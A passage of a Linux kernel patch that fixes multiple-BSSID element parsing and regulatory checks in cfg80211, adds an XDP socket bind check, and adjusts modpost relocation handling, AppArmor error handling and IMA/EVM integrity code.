+ 		case NL80211_IFTYPE_AP:
+@@ -2429,9 +2429,17 @@ static bool reg_wdev_chan_valid(struct wiphy *wiphy, struct wireless_dev *wdev)
+ 		case NL80211_IFTYPE_P2P_DEVICE:
+ 			/* no enforcement required */
+ 			break;
++		case NL80211_IFTYPE_OCB:
++			if (!wdev->u.ocb.chandef.chan)
++				continue;
++			chandef = wdev->u.ocb.chandef;
++			break;
++		case NL80211_IFTYPE_NAN:
++			/* we have no info, but NAN is also pretty universal */
++			continue;
+ 		default:
+ 			/* others not implemented for now */
+-			WARN_ON(1);
++			WARN_ON_ONCE(1);
+ 			break;
+ 		}
+ 
+@@ -2490,9 +2498,7 @@ static void reg_check_chans_work(struct work_struct *work)
+ 	rtnl_lock();
+ 
+ 	list_for_each_entry(rdev, &cfg80211_rdev_list, list)
+-		if (!(rdev->wiphy.regulatory_flags &
+-		      REGULATORY_IGNORE_STALE_KICKOFF))
+-			reg_leave_invalid_chans(&rdev->wiphy);
++		reg_leave_invalid_chans(&rdev->wiphy);
+ 
+ 	rtnl_unlock();
+ }
+diff --git a/net/wireless/scan.c b/net/wireless/scan.c
+index 6c2b73c0d36e8..efe9283e98935 100644
+--- a/net/wireless/scan.c
++++ b/net/wireless/scan.c
+@@ -262,117 +262,152 @@ bool cfg80211_is_element_inherited(const struct element *elem,
+ }
+ EXPORT_SYMBOL(cfg80211_is_element_inherited);
+ 
+-static size_t cfg80211_gen_new_ie(const u8 *ie, size_t ielen,
+-				  const u8 *subelement, size_t subie_len,
+-				  u8 *new_ie, gfp_t gfp)
++static size_t cfg80211_copy_elem_with_frags(const struct element *elem,
++					    const u8 *ie, size_t ie_len,
++					    u8 **pos, u8 *buf, size_t buf_len)
+ {
+-	u8 *pos, *tmp;
+-	const u8 *tmp_old, *tmp_new;
+-	const struct element *non_inherit_elem;
+-	u8 *sub_copy;
++	if (WARN_ON((u8 *)elem < ie || elem->data > ie + ie_len ||
++		    elem->data + elem->datalen > ie + ie_len))
++		return 0;
+ 
+-	/* copy subelement as we need to change its content to
+-	 * mark an ie after it is processed.
+-	 */
+-	sub_copy = kmemdup(subelement, subie_len, gfp);
+-	if (!sub_copy)
++	if (elem->datalen + 2 > buf + buf_len - *pos)
+ 		return 0;
+ 
+-	pos = &new_ie[0];
++	memcpy(*pos, elem, elem->datalen + 2);
++	*pos += elem->datalen + 2;
++
++	/* Finish if it is not fragmented  */
++	if (elem->datalen != 255)
++		return *pos - buf;
++
++	ie_len = ie + ie_len - elem->data - elem->datalen;
++	ie = (const u8 *)elem->data + elem->datalen;
++
++	for_each_element(elem, ie, ie_len) {
++		if (elem->id != WLAN_EID_FRAGMENT)
++			break;
++
++		if (elem->datalen + 2 > buf + buf_len - *pos)
++			return 0;
++
++		memcpy(*pos, elem, elem->datalen + 2);
++		*pos += elem->datalen + 2;
+ 
+-	/* set new ssid */
+-	tmp_new = cfg80211_find_ie(WLAN_EID_SSID, sub_copy, subie_len);
+-	if (tmp_new) {
+-		memcpy(pos, tmp_new, tmp_new[1] + 2);
+-		pos += (tmp_new[1] + 2);
++		if (elem->datalen != 255)
++			break;
+ 	}
+ 
+-	/* get non inheritance list if exists */
+-	non_inherit_elem =
+-		cfg80211_find_ext_elem(WLAN_EID_EXT_NON_INHERITANCE,
+-				       sub_copy, subie_len);
++	return *pos - buf;
++}
+ 
+-	/* go through IEs in ie (skip SSID) and subelement,
+-	 * merge them into new_ie
++static size_t cfg80211_gen_new_ie(const u8 *ie, size_t ielen,
++				  const u8 *subie, size_t subie_len,
++				  u8 *new_ie, size_t new_ie_len)
++{
++	const struct element *non_inherit_elem, *parent, *sub;
++	u8 *pos = new_ie;
++	u8 id, ext_id;
++	unsigned int match_len;
++
++	non_inherit_elem = cfg80211_find_ext_elem(WLAN_EID_EXT_NON_INHERITANCE,
++						  subie, subie_len);
++
++	/* We copy the elements one by one from the parent to the generated
++	 * elements.
++	 * If they are not inherited (included in subie or in the non
++	 * inheritance element), then we copy all occurrences the first time
++	 * we see this element type.
+ 	 */
+-	tmp_old = cfg80211_find_ie(WLAN_EID_SSID, ie, ielen);
+-	tmp_old = (tmp_old) ? tmp_old + tmp_old[1] + 2 : ie;
+-
+-	while (tmp_old + 2 - ie <= ielen &&
+-	       tmp_old + tmp_old[1] + 2 - ie <= ielen) {
+-		if (tmp_old[0] == 0) {
+-			tmp_old++;
++	for_each_element(parent, ie, ielen) {
++		if (parent->id == WLAN_EID_FRAGMENT)
+ 			continue;
++
++		if (parent->id == WLAN_EID_EXTENSION) {
++			if (parent->datalen < 1)
++				continue;
++
++			id = WLAN_EID_EXTENSION;
++			ext_id = parent->data[0];
++			match_len = 1;
++		} else {
++			id = parent->id;
++			match_len = 0;
+ 		}
+ 
+-		if (tmp_old[0] == WLAN_EID_EXTENSION)
+-			tmp = (u8 *)cfg80211_find_ext_ie(tmp_old[2], sub_copy,
+-							 subie_len);
+-		else
+-			tmp = (u8 *)cfg80211_find_ie(tmp_old[0], sub_copy,
+-						     subie_len);
++		/* Find first occurrence in subie */
++		sub = cfg80211_find_elem_match(id, subie, subie_len,
++					       &ext_id, match_len, 0);
+ 
+-		if (!tmp) {
+-			const struct element *old_elem = (void *)tmp_old;
++		/* Copy from parent if not in subie and inherited */
++		if (!sub &&
++		    cfg80211_is_element_inherited(parent, non_inherit_elem)) {
++			if (!cfg80211_copy_elem_with_frags(parent,
++							   ie, ielen,
++							   &pos, new_ie,
++							   new_ie_len))
++				return 0;
+ 
+-			/* ie in old ie but not in subelement */
+-			if (cfg80211_is_element_inherited(old_elem,
+-							  non_inherit_elem)) {
+-				memcpy(pos, tmp_old, tmp_old[1] + 2);
+-				pos += tmp_old[1] + 2;
+-			}
+-		} else {
+-			/* ie in transmitting ie also in subelement,
+-			 * copy from subelement and flag the ie in subelement
+-			 * as copied (by setting eid field to WLAN_EID_SSID,
+-			 * which is skipped anyway).
+-			 * For vendor ie, compare OUI + type + subType to
+-			 * determine if they are the same ie.
+-			 */
+-			if (tmp_old[0] == WLAN_EID_VENDOR_SPECIFIC) {
+-				if (tmp_old[1] >= 5 && tmp[1] >= 5 &&
+-				    !memcmp(tmp_old + 2, tmp + 2, 5)) {
+-					/* same vendor ie, copy from
+-					 * subelement
+-					 */
+-					memcpy(pos, tmp, tmp[1] + 2);
+-					pos += tmp[1] + 2;
+-					tmp[0] = WLAN_EID_SSID;
+-				} else {
+-					memcpy(pos, tmp_old, tmp_old[1] + 2);
+-					pos += tmp_old[1] + 2;
+-				}
+-			} else {
+-				/* copy ie from subelement into new ie */
+-				memcpy(pos, tmp, tmp[1] + 2);
+-				pos += tmp[1] + 2;
+-				tmp[0] = WLAN_EID_SSID;
+-			}
++			continue;
+ 		}
+ 
+-		if (tmp_old + tmp_old[1] + 2 - ie == ielen)
+-			break;
++		/* Already copied if an earlier element had the same type */
++		if (cfg80211_find_elem_match(id, ie, (u8 *)parent - ie,
++					     &ext_id, match_len, 0))
++			continue;
+ 
+-		tmp_old += tmp_old[1] + 2;
++		/* Not inheriting, copy all similar elements from subie */
++		while (sub) {
++			if (!cfg80211_copy_elem_with_frags(sub,
++							   subie, subie_len,
++							   &pos, new_ie,
++							   new_ie_len))
++				return 0;
++
++			sub = cfg80211_find_elem_match(id,
++						       sub->data + sub->datalen,
++						       subie_len + subie -
++						       (sub->data +
++							sub->datalen),
++						       &ext_id, match_len, 0);
++		}
+ 	}
+ 
+-	/* go through subelement again to check if there is any ie not
+-	 * copied to new ie, skip ssid, capability, bssid-index ie
++	/* The above misses elements that are included in subie but not in the
++	 * parent, so do a pass over subie and append those.
++	 * Skip the non-tx BSSID caps and non-inheritance element.
+ 	 */
+-	tmp_new = sub_copy;
+-	while (tmp_new + 2 - sub_copy <= subie_len &&
+-	       tmp_new + tmp_new[1] + 2 - sub_copy <= subie_len) {
+-		if (!(tmp_new[0] == WLAN_EID_NON_TX_BSSID_CAP ||
+-		      tmp_new[0] == WLAN_EID_SSID)) {
+-			memcpy(pos, tmp_new, tmp_new[1] + 2);
+-			pos += tmp_new[1] + 2;
++	for_each_element(sub, subie, subie_len) {
++		if (sub->id == WLAN_EID_NON_TX_BSSID_CAP)
++			continue;
++
++		if (sub->id == WLAN_EID_FRAGMENT)
++			continue;
++
++		if (sub->id == WLAN_EID_EXTENSION) {
++			if (sub->datalen < 1)
++				continue;
++
++			id = WLAN_EID_EXTENSION;
++			ext_id = sub->data[0];
++			match_len = 1;
++
++			if (ext_id == WLAN_EID_EXT_NON_INHERITANCE)
++				continue;
++		} else {
++			id = sub->id;
++			match_len = 0;
+ 		}
+-		if (tmp_new + tmp_new[1] + 2 - sub_copy == subie_len)
+-			break;
+-		tmp_new += tmp_new[1] + 2;
++
++		/* Processed if one was included in the parent */
++		if (cfg80211_find_elem_match(id, ie, ielen,
++					     &ext_id, match_len, 0))
++			continue;
++
++		if (!cfg80211_copy_elem_with_frags(sub, subie, subie_len,
++						   &pos, new_ie, new_ie_len))
++			return 0;
+ 	}
+ 
+-	kfree(sub_copy);
+ 	return pos - new_ie;
+ }
+ 
+@@ -2224,7 +2259,7 @@ static void cfg80211_parse_mbssid_data(struct wiphy *wiphy,
+ 			new_ie_len = cfg80211_gen_new_ie(ie, ielen,
+ 							 profile,
+ 							 profile_len, new_ie,
+-							 gfp);
++							 IEEE80211_MAX_DATA_LEN);
+ 			if (!new_ie_len)
+ 				continue;
+ 
+@@ -2273,118 +2308,6 @@ cfg80211_inform_bss_data(struct wiphy *wiphy,
+ }
+ EXPORT_SYMBOL(cfg80211_inform_bss_data);
+ 
+-static void
+-cfg80211_parse_mbssid_frame_data(struct wiphy *wiphy,
+-				 struct cfg80211_inform_bss *data,
+-				 struct ieee80211_mgmt *mgmt, size_t len,
+-				 struct cfg80211_non_tx_bss *non_tx_data,
+-				 gfp_t gfp)
+-{
+-	enum cfg80211_bss_frame_type ftype;
+-	const u8 *ie = mgmt->u.probe_resp.variable;
+-	size_t ielen = len - offsetof(struct ieee80211_mgmt,
+-				      u.probe_resp.variable);
+-
+-	ftype = ieee80211_is_beacon(mgmt->frame_control) ?
+-		CFG80211_BSS_FTYPE_BEACON : CFG80211_BSS_FTYPE_PRESP;
+-
+-	cfg80211_parse_mbssid_data(wiphy, data, ftype, mgmt->bssid,
+-				   le64_to_cpu(mgmt->u.probe_resp.timestamp),
+-				   le16_to_cpu(mgmt->u.probe_resp.beacon_int),
+-				   ie, ielen, non_tx_data, gfp);
+-}
+-
+-static void
+-cfg80211_update_notlisted_nontrans(struct wiphy *wiphy,
+-				   struct cfg80211_bss *nontrans_bss,
+-				   struct ieee80211_mgmt *mgmt, size_t len)
+-{
+-	u8 *ie, *new_ie, *pos;
+-	const struct element *nontrans_ssid;
+-	const u8 *trans_ssid, *mbssid;
+-	size_t ielen = len - offsetof(struct ieee80211_mgmt,
+-				      u.probe_resp.variable);
+-	size_t new_ie_len;
+-	struct cfg80211_bss_ies *new_ies;
+-	const struct cfg80211_bss_ies *old;
+-	size_t cpy_len;
+-
+-	lockdep_assert_held(&wiphy_to_rdev(wiphy)->bss_lock);
+-
+-	ie = mgmt->u.probe_resp.variable;
+-
+-	new_ie_len = ielen;
+-	trans_ssid = cfg80211_find_ie(WLAN_EID_SSID, ie, ielen);
+-	if (!trans_ssid)
+-		return;
+-	new_ie_len -= trans_ssid[1];
+-	mbssid = cfg80211_find_ie(WLAN_EID_MULTIPLE_BSSID, ie, ielen);
+-	/*
+-	 * It's not valid to have the MBSSID element before SSID
+-	 * ignore if that happens - the code below assumes it is
+-	 * after (while copying things inbetween).
+-	 */
+-	if (!mbssid || mbssid < trans_ssid)
+-		return;
+-	new_ie_len -= mbssid[1];
+-
+-	nontrans_ssid = ieee80211_bss_get_elem(nontrans_bss, WLAN_EID_SSID);
+-	if (!nontrans_ssid)
+-		return;
+-
+-	new_ie_len += nontrans_ssid->datalen;
+-
+-	/* generate new ie for nontrans BSS
+-	 * 1. replace SSID with nontrans BSS' SSID
+-	 * 2. skip MBSSID IE
+-	 */
+-	new_ie = kzalloc(new_ie_len, GFP_ATOMIC);
+-	if (!new_ie)
+-		return;
+-
+-	new_ies = kzalloc(sizeof(*new_ies) + new_ie_len, GFP_ATOMIC);
+-	if (!new_ies)
+-		goto out_free;
+-
+-	pos = new_ie;
+-
+-	/* copy the nontransmitted SSID */
+-	cpy_len = nontrans_ssid->datalen + 2;
+-	memcpy(pos, nontrans_ssid, cpy_len);
+-	pos += cpy_len;
+-	/* copy the IEs between SSID and MBSSID */
+-	cpy_len = trans_ssid[1] + 2;
+-	memcpy(pos, (trans_ssid + cpy_len), (mbssid - (trans_ssid + cpy_len)));
+-	pos += (mbssid - (trans_ssid + cpy_len));
+-	/* copy the IEs after MBSSID */
+-	cpy_len = mbssid[1] + 2;
+-	memcpy(pos, mbssid + cpy_len, ((ie + ielen) - (mbssid + cpy_len)));
+-
+-	/* update ie */
+-	new_ies->len = new_ie_len;
+-	new_ies->tsf = le64_to_cpu(mgmt->u.probe_resp.timestamp);
+-	new_ies->from_beacon = ieee80211_is_beacon(mgmt->frame_control);
+-	memcpy(new_ies->data, new_ie, new_ie_len);
+-	if (ieee80211_is_probe_resp(mgmt->frame_control)) {
+-		old = rcu_access_pointer(nontrans_bss->proberesp_ies);
+-		rcu_assign_pointer(nontrans_bss->proberesp_ies, new_ies);
+-		rcu_assign_pointer(nontrans_bss->ies, new_ies);
+-		if (old)
+-			kfree_rcu((struct cfg80211_bss_ies *)old, rcu_head);
+-	} else {
+-		old = rcu_access_pointer(nontrans_bss->beacon_ies);
+-		rcu_assign_pointer(nontrans_bss->beacon_ies, new_ies);
+-		cfg80211_update_hidden_bsses(bss_from_pub(nontrans_bss),
+-					     new_ies, old);
+-		rcu_assign_pointer(nontrans_bss->ies, new_ies);
+-		if (old)
+-			kfree_rcu((struct cfg80211_bss_ies *)old, rcu_head);
+-	}
+-
+-out_free:
+-	kfree(new_ie);
+-}
+-
+ /* cfg80211_inform_bss_width_frame helper */
+ static struct cfg80211_bss *
+ cfg80211_inform_single_bss_frame_data(struct wiphy *wiphy,
+@@ -2526,51 +2449,31 @@ cfg80211_inform_bss_frame_data(struct wiphy *wiphy,
+ 			       struct ieee80211_mgmt *mgmt, size_t len,
+ 			       gfp_t gfp)
+ {
+-	struct cfg80211_bss *res, *tmp_bss;
++	struct cfg80211_bss *res;
+ 	const u8 *ie = mgmt->u.probe_resp.variable;
+-	const struct cfg80211_bss_ies *ies1, *ies2;
+ 	size_t ielen = len - offsetof(struct ieee80211_mgmt,
+ 				      u.probe_resp.variable);
++	enum cfg80211_bss_frame_type ftype;
+ 	struct cfg80211_non_tx_bss non_tx_data = {};
+ 
+ 	res = cfg80211_inform_single_bss_frame_data(wiphy, data, mgmt,
+ 						    len, gfp);
++	if (!res)
++		return NULL;
+ 
+ 	/* don't do any further MBSSID handling for S1G */
+ 	if (ieee80211_is_s1g_beacon(mgmt->frame_control))
+ 		return res;
+ 
+-	if (!res || !wiphy->support_mbssid ||
+-	    !cfg80211_find_elem(WLAN_EID_MULTIPLE_BSSID, ie, ielen))
+-		return res;
+-	if (wiphy->support_only_he_mbssid &&
+-	    !cfg80211_find_ext_elem(WLAN_EID_EXT_HE_CAPABILITY, ie, ielen))
+-		return res;
+-
++	ftype = ieee80211_is_beacon(mgmt->frame_control) ?
++		CFG80211_BSS_FTYPE_BEACON : CFG80211_BSS_FTYPE_PRESP;
+ 	non_tx_data.tx_bss = res;
+-	/* process each non-transmitting bss */
+-	cfg80211_parse_mbssid_frame_data(wiphy, data, mgmt, len,
+-					 &non_tx_data, gfp);
+-
+-	spin_lock_bh(&wiphy_to_rdev(wiphy)->bss_lock);
+ 
+-	/* check if the res has other nontransmitting bss which is not
+-	 * in MBSSID IE
+-	 */
+-	ies1 = rcu_access_pointer(res->ies);
+-
+-	/* go through nontrans_list, if the timestamp of the BSS is
+-	 * earlier than the timestamp of the transmitting BSS then
+-	 * update it
+-	 */
+-	list_for_each_entry(tmp_bss, &res->nontrans_list,
+-			    nontrans_list) {
+-		ies2 = rcu_access_pointer(tmp_bss->ies);
+-		if (ies2->tsf < ies1->tsf)
+-			cfg80211_update_notlisted_nontrans(wiphy, tmp_bss,
+-							   mgmt, len);
+-	}
+-	spin_unlock_bh(&wiphy_to_rdev(wiphy)->bss_lock);
++	/* process each non-transmitting bss */
++	cfg80211_parse_mbssid_data(wiphy, data, ftype, mgmt->bssid,
++				   le64_to_cpu(mgmt->u.probe_resp.timestamp),
++				   le16_to_cpu(mgmt->u.probe_resp.beacon_int),
++				   ie, ielen, &non_tx_data, gfp);
+ 
+ 	return res;
+ }
+diff --git a/net/xdp/xsk.c b/net/xdp/xsk.c
+index 13f62d2402e71..371d269d22fa0 100644
+--- a/net/xdp/xsk.c
++++ b/net/xdp/xsk.c
+@@ -886,6 +886,7 @@ static int xsk_bind(struct socket *sock, struct sockaddr *addr, int addr_len)
+ 	struct sock *sk = sock->sk;
+ 	struct xdp_sock *xs = xdp_sk(sk);
+ 	struct net_device *dev;
++	int bound_dev_if;
+ 	u32 flags, qid;
+ 	int err = 0;
+ 
+@@ -899,6 +900,10 @@ static int xsk_bind(struct socket *sock, struct sockaddr *addr, int addr_len)
+ 		      XDP_USE_NEED_WAKEUP))
+ 		return -EINVAL;
+ 
++	bound_dev_if = READ_ONCE(sk->sk_bound_dev_if);
++	if (bound_dev_if && bound_dev_if != sxdp->sxdp_ifindex)
++		return -EINVAL;
++
+ 	rtnl_lock();
+ 	mutex_lock(&xs->mutex);
+ 	if (xs->state != XSK_READY) {
+diff --git a/samples/bpf/tcp_basertt_kern.c b/samples/bpf/tcp_basertt_kern.c
+index 8dfe09a92feca..822b0742b8154 100644
+--- a/samples/bpf/tcp_basertt_kern.c
++++ b/samples/bpf/tcp_basertt_kern.c
+@@ -47,7 +47,7 @@ int bpf_basertt(struct bpf_sock_ops *skops)
+ 		case BPF_SOCK_OPS_BASE_RTT:
+ 			n = bpf_getsockopt(skops, SOL_TCP, TCP_CONGESTION,
+ 					   cong, sizeof(cong));
+-			if (!n && !__builtin_memcmp(cong, nv, sizeof(nv)+1)) {
++			if (!n && !__builtin_memcmp(cong, nv, sizeof(nv))) {
+ 				/* Set base_rtt to 80us */
+ 				rv = 80;
+ 			} else if (n) {
+diff --git a/samples/bpf/xdp1_kern.c b/samples/bpf/xdp1_kern.c
+index 0a5c704badd00..d91f27cbcfa99 100644
+--- a/samples/bpf/xdp1_kern.c
++++ b/samples/bpf/xdp1_kern.c
+@@ -39,7 +39,7 @@ static int parse_ipv6(void *data, u64 nh_off, void *data_end)
+ 	return ip6h->nexthdr;
+ }
+ 
+-#define XDPBUFSIZE	64
++#define XDPBUFSIZE	60
+ SEC("xdp.frags")
+ int xdp_prog1(struct xdp_md *ctx)
+ {
+diff --git a/samples/bpf/xdp2_kern.c b/samples/bpf/xdp2_kern.c
+index 67804ecf7ce37..8bca674451ed1 100644
+--- a/samples/bpf/xdp2_kern.c
++++ b/samples/bpf/xdp2_kern.c
+@@ -55,7 +55,7 @@ static int parse_ipv6(void *data, u64 nh_off, void *data_end)
+ 	return ip6h->nexthdr;
+ }
+ 
+-#define XDPBUFSIZE	64
++#define XDPBUFSIZE	60
+ SEC("xdp.frags")
+ int xdp_prog1(struct xdp_md *ctx)
+ {
+diff --git a/scripts/Makefile.modfinal b/scripts/Makefile.modfinal
+index 25bedd83644b0..3af5e5807983a 100644
+--- a/scripts/Makefile.modfinal
++++ b/scripts/Makefile.modfinal
+@@ -23,7 +23,7 @@ modname = $(notdir $(@:.mod.o=))
+ part-of-module = y
+ 
+ quiet_cmd_cc_o_c = CC [M]  $@
+-      cmd_cc_o_c = $(CC) $(filter-out $(CC_FLAGS_CFI), $(c_flags)) -c -o $@ $<
++      cmd_cc_o_c = $(CC) $(filter-out $(CC_FLAGS_CFI) $(CFLAGS_GCOV), $(c_flags)) -c -o $@ $<
+ 
+ %.mod.o: %.mod.c FORCE
+ 	$(call if_changed_dep,cc_o_c)
+diff --git a/scripts/mod/modpost.c b/scripts/mod/modpost.c
+index 1dfa80c6b471e..e6be7fc2625fd 100644
+--- a/scripts/mod/modpost.c
++++ b/scripts/mod/modpost.c
+@@ -1157,6 +1157,10 @@ static Elf_Sym *find_elf_symbol(struct elf_info *elf, Elf64_Sword addr,
+ 	if (relsym->st_name != 0)
+ 		return relsym;
+ 
++	/*
++	 * Strive to find a better symbol name, but the resulting name may not
++	 * match the symbol referenced in the original code.
++	 */
+ 	relsym_secindex = get_secindex(elf, relsym);
+ 	for (sym = elf->symtab_start; sym < elf->symtab_stop; sym++) {
+ 		if (get_secindex(elf, sym) != relsym_secindex)
+@@ -1293,49 +1297,12 @@ static void default_mismatch_handler(const char *modname, struct elf_info *elf,
+ 
+ static int is_executable_section(struct elf_info* elf, unsigned int section_index)
+ {
+-	if (section_index > elf->num_sections)
++	if (section_index >= elf->num_sections)
+ 		fatal("section_index is outside elf->num_sections!\n");
+ 
+ 	return ((elf->sechdrs[section_index].sh_flags & SHF_EXECINSTR) == SHF_EXECINSTR);
+ }
+ 
+-/*
+- * We rely on a gross hack in section_rel[a]() calling find_extable_entry_size()
+- * to know the sizeof(struct exception_table_entry) for the target architecture.
+- */
+-static unsigned int extable_entry_size = 0;
+-static void find_extable_entry_size(const char* const sec, const Elf_Rela* r)
+-{
+-	/*
+-	 * If we're currently checking the second relocation within __ex_table,
+-	 * that relocation offset tells us the offsetof(struct
+-	 * exception_table_entry, fixup) which is equal to sizeof(struct
+-	 * exception_table_entry) divided by two.  We use that to our advantage
+-	 * since there's no portable way to get that size as every architecture
+-	 * seems to go with different sized types.  Not pretty but better than
+-	 * hard-coding the size for every architecture..
+-	 */
+-	if (!extable_entry_size)
+-		extable_entry_size = r->r_offset * 2;
+-}
+-
+-static inline bool is_extable_fault_address(Elf_Rela *r)
+-{
+-	/*
+-	 * extable_entry_size is only discovered after we've handled the
+-	 * _second_ relocation in __ex_table, so only abort when we're not
+-	 * handling the first reloc and extable_entry_size is zero.
+-	 */
+-	if (r->r_offset && extable_entry_size == 0)
+-		fatal("extable_entry size hasn't been discovered!\n");
+-
+-	return ((r->r_offset == 0) ||
+-		(r->r_offset % extable_entry_size == 0));
+-}
+-
+-#define is_second_extable_reloc(Start, Cur, Sec)			\
+-	(((Cur) == (Start) + 1) && (strcmp("__ex_table", (Sec)) == 0))
+-
+ static void report_extable_warnings(const char* modname, struct elf_info* elf,
+ 				    const struct sectioncheck* const mismatch,
+ 				    Elf_Rela* r, Elf_Sym* sym,
+@@ -1392,22 +1359,9 @@ static void extable_mismatch_handler(const char* modname, struct elf_info *elf,
+ 		      "You might get more information about where this is\n"
+ 		      "coming from by using scripts/check_extable.sh %s\n",
+ 		      fromsec, (long)r->r_offset, tosec, modname);
+-	else if (!is_executable_section(elf, get_secindex(elf, sym))) {
+-		if (is_extable_fault_address(r))
+-			fatal("The relocation at %s+0x%lx references\n"
+-			      "section \"%s\" which is not executable, IOW\n"
+-			      "it is not possible for the kernel to fault\n"
+-			      "at that address.  Something is seriously wrong\n"
+-			      "and should be fixed.\n",
+-			      fromsec, (long)r->r_offset, tosec);
+-		else
+-			fatal("The relocation at %s+0x%lx references\n"
+-			      "section \"%s\" which is not executable, IOW\n"
+-			      "the kernel will fault if it ever tries to\n"
+-			      "jump to it.  Something is seriously wrong\n"
+-			      "and should be fixed.\n",
+-			      fromsec, (long)r->r_offset, tosec);
+-	}
++	else if (!is_executable_section(elf, get_secindex(elf, sym)))
++		error("%s+0x%lx references non-executable section '%s'\n",
++		      fromsec, (long)r->r_offset, tosec);
+ }
+ 
+ static void check_section_mismatch(const char *modname, struct elf_info *elf,
+@@ -1465,19 +1419,33 @@ static int addend_386_rel(struct elf_info *elf, Elf_Shdr *sechdr, Elf_Rela *r)
+ #define	R_ARM_THM_JUMP19	51
+ #endif
+ 
++static int32_t sign_extend32(int32_t value, int index)
++{
++	uint8_t shift = 31 - index;
++
++	return (int32_t)(value << shift) >> shift;
++}
++
+ static int addend_arm_rel(struct elf_info *elf, Elf_Shdr *sechdr, Elf_Rela *r)
+ {
+ 	unsigned int r_typ = ELF_R_TYPE(r->r_info);
++	Elf_Sym *sym = elf->symtab_start + ELF_R_SYM(r->r_info);
++	void *loc = reloc_location(elf, sechdr, r);
++	uint32_t inst;
++	int32_t offset;
+ 
+ 	switch (r_typ) {
+ 	case R_ARM_ABS32:
+-		/* From ARM ABI: (S + A) | T */
+-		r->r_addend = (int)(long)
+-			      (elf->symtab_start + ELF_R_SYM(r->r_info));
++		inst = TO_NATIVE(*(uint32_t *)loc);
++		r->r_addend = inst + sym->st_value;
+ 		break;
+ 	case R_ARM_PC24:
+ 	case R_ARM_CALL:
+ 	case R_ARM_JUMP24:
++		inst = TO_NATIVE(*(uint32_t *)loc);
++		offset = sign_extend32((inst & 0x00ffffff) << 2, 25);
++		r->r_addend = offset + sym->st_value + 8;
++		break;
+ 	case R_ARM_THM_CALL:
+ 	case R_ARM_THM_JUMP24:
+ 	case R_ARM_THM_JUMP19:
+@@ -1569,8 +1537,6 @@ static void section_rela(const char *modname, struct elf_info *elf,
+ 		/* Skip special sections */
+ 		if (is_shndx_special(sym->st_shndx))
+ 			continue;
+-		if (is_second_extable_reloc(start, rela, fromsec))
+-			find_extable_entry_size(fromsec, &r);
+ 		check_section_mismatch(modname, elf, &r, sym, fromsec);
+ 	}
+ }
+@@ -1628,8 +1594,6 @@ static void section_rel(const char *modname, struct elf_info *elf,
+ 		/* Skip special sections */
+ 		if (is_shndx_special(sym->st_shndx))
+ 			continue;
+-		if (is_second_extable_reloc(start, rel, fromsec))
+-			find_extable_entry_size(fromsec, &r);
+ 		check_section_mismatch(modname, elf, &r, sym, fromsec);
+ 	}
+ }
+diff --git a/security/apparmor/policy_unpack.c b/security/apparmor/policy_unpack.c
+index 9d26bbb901338..9c3fec2c7cf6b 100644
+--- a/security/apparmor/policy_unpack.c
++++ b/security/apparmor/policy_unpack.c
+@@ -917,8 +917,13 @@ static struct aa_profile *unpack_profile(struct aa_ext *e, char **ns_name)
+ 				goto fail;
+ 			}
+ 
+-			rhashtable_insert_fast(profile->data, &data->head,
+-					       profile->data->p);
++			if (rhashtable_insert_fast(profile->data, &data->head,
++						   profile->data->p)) {
++				kfree_sensitive(data->key);
++				kfree_sensitive(data);
++				info = "failed to insert data to table";
++				goto fail;
++			}
+ 		}
+ 
+ 		if (!unpack_nameX(e, AA_STRUCTEND, NULL)) {
+diff --git a/security/integrity/evm/evm_crypto.c b/security/integrity/evm/evm_crypto.c
+index 708de9656bbd2..b9395f8ef5829 100644
+--- a/security/integrity/evm/evm_crypto.c
++++ b/security/integrity/evm/evm_crypto.c
+@@ -40,7 +40,7 @@ static const char evm_hmac[] = "hmac(sha1)";
+ /**
+  * evm_set_key() - set EVM HMAC key from the kernel
+  * @key: pointer to a buffer with the key data
+- * @size: length of the key data
++ * @keylen: length of the key data
+  *
+  * This function allows setting the EVM HMAC key from the kernel
+  * without using the "encrypted" key subsystem keys. It can be used
+diff --git a/security/integrity/evm/evm_main.c b/security/integrity/evm/evm_main.c
+index 23d484e05e6f2..a338f19447d03 100644
+--- a/security/integrity/evm/evm_main.c
++++ b/security/integrity/evm/evm_main.c
+@@ -318,7 +318,6 @@ int evm_protected_xattr_if_enabled(const char *req_xattr_name)
+ /**
+  * evm_read_protected_xattrs - read EVM protected xattr names, lengths, values
+  * @dentry: dentry of the read xattrs
+- * @inode: inode of the read xattrs
+  * @buffer: buffer xattr names, lengths or values are copied to
+  * @buffer_size: size of buffer
+  * @type: n: names, l: lengths, v: values
+@@ -390,6 +389,7 @@ int evm_read_protected_xattrs(struct dentry *dentry, u8 *buffer,
+  * @xattr_name: requested xattr
+  * @xattr_value: requested xattr value
+  * @xattr_value_len: requested xattr value length
++ * @iint: inode integrity metadata
+  *
+  * Calculate the HMAC for the given dentry and verify it against the stored
+  * security.evm xattr. For performance, use the xattr value and length
+@@ -776,7 +776,9 @@ static int evm_attr_change(struct user_namespace *mnt_userns,
+ 
+ /**
+  * evm_inode_setattr - prevent updating an invalid EVM extended attribute
++ * @idmap: idmap of the mount
+  * @dentry: pointer to the affected dentry
++ * @attr: iattr structure containing the new file attributes
+  *
+  * Permit update of file attributes when files have a valid EVM signature,
+  * except in the case of them having an immutable portable signature.
+diff --git a/security/integrity/iint.c b/security/integrity/iint.c
+index 8638976f7990b..65418e0906c13 100644
+--- a/security/integrity/iint.c
++++ b/security/integrity/iint.c
+@@ -43,12 +43,10 @@ static struct integrity_iint_cache *__integrity_iint_find(struct inode *inode)
+ 		else if (inode > iint->inode)
+ 			n = n->rb_right;
+ 		else
+-			break;
++			return iint;
+ 	}
+-	if (!n)
+-		return NULL;
+ 
+-	return iint;
++	return NULL;
+ }
+ 
+ /*
+@@ -121,10 +119,15 @@ struct integrity_iint_cache *integrity_inode_get(struct inode *inode)
+ 		parent = *p;
+ 		test_iint = rb_entry(parent, struct integrity_iint_cache,
+ 				     rb_node);
+-		if (inode < test_iint->inode)
++		if (inode < test_iint->inode) {
+ 			p = &(*p)->rb_left;
+-		else
++		} else if (inode > test_iint->inode) {
+ 			p = &(*p)->rb_right;
++		} else {
++			write_unlock(&integrity_iint_lock);
++			kmem_cache_free(iint_cache, iint);
++			return test_iint;
++		}
+ 	}
+ 
+ 	iint->inode = inode;
+diff --git a/security/integrity/ima/ima_modsig.c b/security/integrity/ima/ima_modsig.c
+index fb25723c65bc4..3e7bee30080f2 100644
+--- a/security/integrity/ima/ima_modsig.c
++++ b/security/integrity/ima/ima_modsig.c
+@@ -89,6 +89,9 @@ int ima_read_modsig(enum ima_hooks func, const void *buf, loff_t buf_len,
+ 
+ /**
